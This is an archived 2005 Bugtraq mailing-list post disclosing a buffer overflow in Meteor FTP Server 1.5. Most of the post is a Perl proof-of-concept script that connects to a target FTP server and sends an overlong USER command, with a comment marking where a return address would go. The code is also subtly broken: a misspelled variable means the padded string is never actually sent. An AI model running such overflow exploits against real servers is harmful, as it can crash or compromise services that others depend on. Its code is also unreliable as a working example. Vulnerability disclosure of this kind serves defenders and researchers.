lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 24 May 2005 02:08:30 +0400
From: Dim K0r0l <dim@...lytez.com>
To: bugtraq@...urityfocus.com
Subject: Meteor FTP Server: PoC Exploit


[INTRO]
Affected version: 1.5
Hello to all!
Bug was found  by Auston J (Anix44@...il.com) today.
So its perl code for demostration
[----]


[CODE]
#!/usr/bin/perl

#
# 47meteor_bof.pl - PoC exploit for Meteor FTP Server
# version 1.5                                    
# bug found by Anix44@...il.com  
#           
# coded by k0r0l from acolytez team
# visit http://acolytez.com for details   
#

use Net::FTP;

# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
# ===========

$ftp_error = "Unable";


if (($host) && ($port)) {
   
    # make exploit string
    $exploit_string = "USER ";
     $exploit_string .= "X"x80;
    #$exploit_string .= "\n\n\n\n"; - it will be new return point !
    #  ===================
   
    print "Trying to connect to $host:$port\n";       
    $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug => 
$debug) or die "[-] Connection failed\n";
    print "[+] Connect OK!\n";
    print "Sending string...\n";
    $sock->login($exploit_sting, "testpassword");
    $answer = $sock->message;
    if ($answer =~ m/$ftp_error/i) {
        print "\n[-] Sorry! Failed\n";
    } else {
        print "\n[+] Send ok!\nServer can be explorated!\n\n";
    }
   
   
} else {
    print "\nMeteor FTP Server - PoC 
Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
}

[----]

-- 
+################################+
# Dim K0r0l (dim@...lytez.com)   #
#                                #
# http://AcolyteZ.com            #
# Net-security, coding, soft etc #
+################################+



Powered by blists - more mailing lists